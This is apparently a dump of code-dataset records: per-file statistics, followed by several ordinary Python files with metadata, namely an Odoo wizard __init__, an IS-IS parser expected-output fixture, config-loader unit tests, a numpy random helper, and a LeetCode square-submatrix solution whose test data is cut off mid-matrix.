| 31.52514
| 101
| 0.616516
| 646
| 5,643
| 5.142415
| 0.153251
| 0.069235
| 0.066526
| 0.082179
| 0.852498
| 0.829922
| 0.789585
| 0.746839
| 0.72637
| 0.72637
| 0
| 0.005532
| 0.263158
| 5,643
| 178
| 102
| 31.702247
| 0.79341
| 0.013645
| 0
| 0.719178
| 0
| 0.006849
| 0.12709
| 0.015999
| 0
| 0
| 0
| 0
| 0.068493
| 1
| 0.136986
| false
| 0.013699
| 0.041096
| 0
| 0.212329
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87ee5a633670f6f81818c998480852d4f1b4b21d
| 262
|
py
|
Python
|
mg_approval/wizard/__init__.py
|
divyapy/odoo
|
a4b796fc8a9d291ff1b4c93e53e27f566947adf2
|
[
"MIT"
] | null | null | null |
mg_approval/wizard/__init__.py
|
divyapy/odoo
|
a4b796fc8a9d291ff1b4c93e53e27f566947adf2
|
[
"MIT"
] | null | null | null |
mg_approval/wizard/__init__.py
|
divyapy/odoo
|
a4b796fc8a9d291ff1b4c93e53e27f566947adf2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import purchase_action_dashboard_wizard
from . import po_details_wizard
from . import create_tender
from . import pr_approve_wizard
from . import pr_reject_wizard
from . import pr_withdraw_wizard
from . import create_single_source
| 29.111111
| 46
| 0.812977
| 38
| 262
| 5.236842
| 0.5
| 0.351759
| 0.40201
| 0.221106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004367
| 0.125954
| 262
| 9
| 47
| 29.111111
| 0.864629
| 0.080153
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
87f8597d74baf6e77145c7645d8fbfec20709996
| 17,530
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_13_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_13_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_13_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
"tag": {
"1": {
"topo_type": "unicast",
"topo_name": "base",
"tid": 0,
"topo_id": "0x0",
"flex_algo": {
128: {
"prefix": {
"2.2.2.2": {
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"subnet": "32",
"source_router_id": "2.2.2.2",
"algo": {
0: {
"sid_index": 23,
"bound": True
},
1: {}
},
"via_interface": {
"Ethernet0/1": {
"level": {
"L1": {
"source_ip": {
"2.2.2.2": {
"lsp": {
"next_hop_lsp_index": 3,
"rtp_lsp_index": 3,
"rtp_lsp_version": 9,
"tpl_lsp_version": 9
},
"distance": 115,
"metric": 10,
"via_ip": "12.1.1.2",
"tag": "0",
"host": "R2.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 23,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "implicit-null"
},
1: {}
}
}
}
},
"L2": {
"source_ip": {
"2.2.2.2": {
"lsp": {
"next_hop_lsp_index": 4,
"rtp_lsp_index": 4,
"rtp_lsp_version": 15,
"tpl_lsp_version": 15
},
"distance": 115,
"metric": 10,
"via_ip": "12.1.1.2",
"tag": "0",
"host": "R2.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 23,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
},
"Ethernet0/2": {
"level": {
"L2": {
"source_ip": {
"3.3.3.3": {
"lsp": {
"next_hop_lsp_index": 6,
"rtp_lsp_index": 6,
"rtp_lsp_version": 17,
"tpl_lsp_version": 17
},
"distance": 115,
"metric": 30,
"via_ip": "13.1.1.2",
"tag": "0",
"host": "R3.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": True
},
"algo": {
0: {
"sid_index": 23,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
}
}
},
"3.3.3.3": {
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"subnet": "32",
"algo": {
0: {
"sid_index": 33,
"bound": True
},
1: {}
},
"via_interface": {
"Ethernet0/2": {
"level": {
"L1": {
"source_ip": {
"3.3.3.3": {
"lsp": {
"next_hop_lsp_index": 5,
"rtp_lsp_index": 5,
"rtp_lsp_version": 9,
"tpl_lsp_version": 9
},
"distance": 115,
"metric": 10,
"via_ip": "13.1.1.2",
"tag": "0",
"host": "R3.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 33,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "implicit-null"
},
1: {}
}
}
}
},
"L2": {
"source_ip": {
"3.3.3.3": {
"lsp": {
"next_hop_lsp_index": 6,
"rtp_lsp_index": 6,
"rtp_lsp_version": 17,
"tpl_lsp_version": 17
},
"distance": 115,
"metric": 10,
"via_ip": "13.1.1.2",
"tag": "0",
"host": "R3.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 33,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
},
"Ethernet0/1": {
"level": {
"L2": {
"source_ip": {
"2.2.2.2": {
"lsp": {
"next_hop_lsp_index": 4,
"rtp_lsp_index": 4,
"rtp_lsp_version": 15,
"tpl_lsp_version": 15
},
"distance": 115,
"metric": 30,
"via_ip": "12.1.1.2",
"tag": "0",
"host": "R2.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": True
},
"algo": {
0: {
"sid_index": 33,
"flags": {
"r_flag": True,
"n_flag": True,
"p_flag": True,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
| 60.24055
| 84
| 0.115801
| 578
| 17,530
| 3.240484
| 0.129758
| 0.201815
| 0.067272
| 0.064602
| 0.928991
| 0.896423
| 0.854245
| 0.854245
| 0.854245
| 0.854245
| 0
| 0.07194
| 0.824758
| 17,530
| 291
| 85
| 60.24055
| 0.53776
| 0
| 0
| 0.697595
| 0
| 0
| 0.094689
| 0
| 0
| 0
| 0.000171
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e21123484b6f7f78e6edc5a38b68ea895d9056bc
| 2,361
|
py
|
Python
|
tests/test_utils.py
|
rohankumardubey/configurationfileValidator
|
0acd1eccda6cd71c69d2ae33166a16a257685811
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
rohankumardubey/configurationfileValidator
|
0acd1eccda6cd71c69d2ae33166a16a257685811
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
rohankumardubey/configurationfileValidator
|
0acd1eccda6cd71c69d2ae33166a16a257685811
|
[
"MIT"
] | null | null | null |
import unittest
import yaml
from confirm import utils
class LoadConfigFileTestCase(unittest.TestCase):
    """Exercises confirm.utils.load_config_file across file formats,
    extensions and interpolation-style option values."""

    def _check_loads(self, config_file_path, config_file):
        # Helper: the content must load successfully and expose 'section'.
        loaded_config = utils.load_config_file(config_file_path, config_file)
        self.assertIn('section', loaded_config)

    def test_yaml(self):
        # Plain YAML content with a .yaml extension.
        self._check_loads('schema.yaml', """
section:
option=value
""")

    def test_invalid_yaml(self):
        # Malformed YAML raises the YAML library's own error type.
        config_file = """
[[[section]]]
option=value
"""
        self.assertRaises(yaml.YAMLError, utils.load_config_file,
                          'schema.yaml', config_file)

    def test_infer_yaml(self):
        # YAML content is still loaded despite an unrecognised extension.
        self._check_loads('schema.notyaml', """
section:
option=value
""")

    def test_extension_case_insensitive(self):
        # Extension matching must ignore case for both YAML and CONF.
        yaml_content = """
section:
option=value
"""
        self._check_loads('schema.yaml', yaml_content)
        self._check_loads('schema.YAML', yaml_content)
        conf_content = """[section]\noption=value"""
        self._check_loads('schema.CONF', conf_content)
        self._check_loads('schema.conf', conf_content)

    def test_ini_interpolation_compatible(self):
        # ConfigParser-style interpolation tokens must not break loading.
        self._check_loads('schema.ini', """[section]\noption=%(value)s %()s %s""")

    def test_yaml_interpolation_compatible(self):
        # The same interpolation tokens inside YAML content.
        self._check_loads('schema.yaml', """
section:
option=%(value)s %()s %s
""")
| 28.445783
| 96
| 0.651419
| 271
| 2,361
| 5.306273
| 0.132841
| 0.299026
| 0.175243
| 0.125174
| 0.871349
| 0.853268
| 0.7879
| 0.7879
| 0.762865
| 0.732962
| 0
| 0
| 0.246929
| 2,361
| 82
| 97
| 28.792683
| 0.808774
| 0
| 0
| 0.655172
| 0
| 0
| 0.202033
| 0.021177
| 0
| 0
| 0
| 0
| 0.155172
| 1
| 0.103448
| false
| 0
| 0.051724
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35c351756ef60314e29398f1648129964e5909a9
| 72
|
py
|
Python
|
python/src/test/resources/pyfunc/numpy_random1_test.py
|
maropu/lljvm-translator
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 70
|
2017-12-12T10:54:00.000Z
|
2022-03-22T07:45:19.000Z
|
python/src/test/resources/pyfunc/numpy_random1_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 14
|
2018-02-28T01:29:46.000Z
|
2019-12-10T01:42:22.000Z
|
python/src/test/resources/pyfunc/numpy_random1_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 4
|
2019-07-21T07:58:25.000Z
|
2021-02-01T09:46:59.000Z
|
import numpy as np


def numpy_random1_test():
    """Return one uniform random float drawn from [0.0, 1.0).

    Uses ``np.random.random_sample`` instead of the original
    ``np.random.ranf``: ``ranf`` is a legacy alias of ``random_sample``
    (deprecated and removed in NumPy 2.0) with identical behaviour, so
    the sampled distribution is unchanged.
    """
    return np.random.random_sample()
| 14.4
| 25
| 0.75
| 12
| 72
| 4.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016393
| 0.152778
| 72
| 4
| 26
| 18
| 0.836066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ea785a5fced985133b6770b9bfffb1026f82ccc2
| 97,734
|
py
|
Python
|
No_1277_Count Square Submatrices with All Ones/count_square_submatrices_with_all_ones_by_integral_image.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 32
|
2020-01-05T13:37:16.000Z
|
2022-03-26T07:27:09.000Z
|
No_1277_Count Square Submatrices with All Ones/count_square_submatrices_with_all_ones_by_integral_image.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | null | null | null |
No_1277_Count Square Submatrices with All Ones/count_square_submatrices_with_all_ones_by_integral_image.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 8
|
2020-06-18T16:17:27.000Z
|
2022-03-15T23:58:18.000Z
|
from typing import List
class Solution:
    """LeetCode 1277 — count square submatrices of all ones, solved with a
    2-D prefix sum (integral image)."""

    def countSquares(self, matrix: List[List[int]]) -> int:
        """Return the number of square submatrices consisting only of ones.

        Builds an integral image, then for each top-left corner grows the
        square's side until its prefix-sum area stops matching side*side.
        """
        rows, cols = len(matrix), len(matrix[0])
        max_side = min(rows, cols)

        # prefix[y][x] = sum of matrix[0..y][0..x], inclusive.
        prefix = [[0] * cols for _ in range(rows)]
        for y in range(rows):
            running = 0
            for x in range(cols):
                running += matrix[y][x]
                prefix[y][x] = running + (prefix[y - 1][x] if y > 0 else 0)

        total = 0
        for y in range(rows):
            for x in range(cols):
                for side in range(1, max_side + 1):
                    # Stop when the square would fall off the matrix.
                    if y + side > rows or x + side > cols:
                        break
                    if side == 1:
                        area = matrix[y][x]
                    else:
                        # Standard four-corner integral-image lookup.
                        br = prefix[y + side - 1][x + side - 1]
                        bl = prefix[y + side - 1][x - 1] if x >= 1 else 0
                        tr = prefix[y - 1][x + side - 1] if y >= 1 else 0
                        tl = prefix[y - 1][x - 1] if x >= 1 and y >= 1 else 0
                        area = br - bl - tr + tl
                    if area != side * side:
                        # If this side contains a zero, every larger square
                        # from the same corner does too — stop growing.
                        break
                    total += 1
        return total
# m : the dimension of column of matrix
# n : the dimension of row of matrix
# k : min(m,n)
## Time Complexity: O( m * n * k)
#
# The overhead in time is the nested loop, which is of O( m * n * k )
## Space Complexity: O( m * n )
#
# The overhead in space is the storage for integral image, which is of O( m * n )
from collections import namedtuple
TestEntry = namedtuple('TestEntry', 'matrix')
def test_bench():
test_data = [
TestEntry( matrix = [
[0,1,1,1],
[1,1,1,1],
[0,1,1,1]
]),
TestEntry( matrix = [
[1,0,1],
[1,1,0],
[1,1,0]
]
),
TestEntry( matrix = [[0,0,0,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,1,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,0,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,1,1,1,1,1,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,0,0,1,1,0,1,1,1,0,0,1,0,1,1,1,0,1,0,0,0,0,1,1,0,0,0,1],[1,1,1,0,1,1,0,1,0,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,0,1,0,0,0,1,1,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,1,0,0,1,0,1,1,1,1,0,1,0,1,1,0,1,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,1,0,0,1,0,1,0,0,1,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,0,0,1,1,0,0],[1,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,0,0,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,0,1,1,1,1,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,0,0,1,1,0,0,1,1,1,1,0,1,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,1,1],[0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,0,1,1,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,1,1,0,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,1,0,0,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,1,0,0,1,0,1,0,1,0,0,1,0,0,1,0,1,0,1],[0,1,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,0,1,0,0,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,0,
0,0,0,0,0,0,1,0,1,1,1,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,0],[0,0,1,0,0,0,0,1,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,0,1,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,0,1],[1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,0,1,1,0,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,0,1,0,1,1,1,0,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,1,0,1,1,1],[1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,1,0,0,1,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,0,1,1,0,1,0,0,1,0,1,0,1,1,0,1,1,0,1,0,1,0,0,1,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,1],[0,1,1,0,1,1,1,0,0,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,0,1,1,0,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,1],[0,1,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,1,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,0,0,1,0,1,0,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,0,0,1,0,1,0,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,
0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,1,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1],[1,0,0,0,1,1,0,1,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,0,0,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,1,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,0,1,1,1,0,0,0,1,0,0,0,1,0,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,0,0,0,0],[1,0,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,0,0,1,1,0,0,0,0,1,0,1,0,1,1,0,1,0,1,1,0,1,1,1,1,0,1,0,1,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,0,1,0,1,1,1,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,0,0,1,0,1,1,1,0,0,1,0,1,0,1,1,0,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,0,1,1,0,1,1,0],[0,0,1,0,0,1,0,0,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,1,1,1,0,0,0,1,1,1,1,0,0,0,1],[1,1,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,0,0,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,0,1,0,1,1,0,1,0,0,1,0,0,1,1,1,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,0,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0],[0,1,0,0,1,0,0,0,1,1,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,0,0,1,1,0,0,1,0,1,0,1,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,1,1,1,0,0,0,0,0,
1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,1,0,1,0,0],[0,0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,1,1,0,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,1,1,1,1,1,1,1,0,1,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,1,1,0,0,1,0,0,1,0,1,1,0,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,0,1,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,1,0,1,0,1,0,0,1,0,1,0],[0,1,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,0,0,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,0,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,0,1,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,0,1,1,0,1,1,0,0,0,0,1,0,0,1,1],[0,1,0,1,0,1,0,1,1,1,1,1,1,0,0,1,1,0,1,1,1,0,0,0,1,1,0,0,1,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,0,1,0,1,1,1,1,1,0,0,1,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,1,0,1,0,0,0,